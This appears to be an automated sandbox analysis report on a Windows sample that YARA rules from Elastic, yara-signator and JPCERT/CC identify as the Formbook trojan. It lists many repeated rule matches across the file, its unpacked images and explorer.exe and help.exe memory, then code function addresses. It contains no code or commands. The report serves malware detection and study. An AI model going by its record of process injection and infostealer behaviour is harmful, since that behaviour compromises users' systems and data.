Source: Yara match	File source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: S22Ls0H4Sz.exe, type: SAMPLE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: S22Ls0H4Sz.exe, type: SAMPLE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: S22Ls0H4Sz.exe, type: SAMPLE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.514186613.00000000047C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: S22Ls0H4Sz.exe PID: 5492, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 3320, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: help.exe PID: 1068, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: S22Ls0H4Sz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: S22Ls0H4Sz.exe, type: SAMPLE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: S22Ls0H4Sz.exe, type: SAMPLE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: S22Ls0H4Sz.exe, type: SAMPLE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.514186613.00000000047C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: S22Ls0H4Sz.exe PID: 5492, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 3320, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: help.exe PID: 1068, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_00381030	0_2_00381030
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039DA11	0_2_0039DA11
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_003812FB	0_2_003812FB
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039EB62	0_2_0039EB62
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039EB5F	0_2_0039EB5F
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039C3D8	0_2_0039C3D8
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039DD5C	0_2_0039DD5C
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_00382D90	0_2_00382D90
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_0039E5C0	0_2_0039E5C0
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_00389E50	0_2_00389E50
Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe	Code function: 0_2_00382FB0	0_2_00382FB0
Source: C:\Windows\explorer.exe	Code function: 1_2_047A8232	1_2_047A8232
Source: C:\Windows\explorer.exe	Code function: 1_2_047A7036	1_2_047A7036
Source: C:\Windows\explorer.exe	Code function: 1_2_0479E082	1_2_0479E082
Source: C:\Windows\explorer.exe	Code function: 1_2_047A2B32	1_2_047A2B32
Source: C:\Windows\explorer.exe	Code function: 1_2_047A2B30	1_2_047A2B30
Source: C:\Windows\explorer.exe	Code function: 1_2_047A5912	1_2_047A5912
Source: C:\Windows\explorer.exe	Code function: 1_2_0479FD02	1_2_0479FD02
Source: C:\Windows\explorer.exe	Code function: 1_2_047AB5CD	1_2_047AB5CD
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEB75CD	1_2_0DEB75CD
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEABD02	1_2_0DEABD02
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEB1912	1_2_0DEB1912
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEAA082	1_2_0DEAA082
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEB3036	1_2_0DEB3036
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEAEB32	1_2_0DEAEB32
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEAEB30	1_2_0DEAEB30
Source: C:\Windows\explorer.exe	Code function: 1_2_0DEB4232	1_2_0DEB4232
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388DBD2	2_2_0388DBD2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03891FF1	2_2_03891FF1
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03892B28	2_2_03892B28
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FEBB0	2_2_037FEBB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038922AE	2_2_038922AE
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E6E30	2_2_037E6E30
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03892EF7	2_2_03892EF7
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C0D20	2_2_037C0D20
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E4120	2_2_037E4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CF900	2_2_037CF900
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03892D07	2_2_03892D07
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DD5E0	2_2_037DD5E0
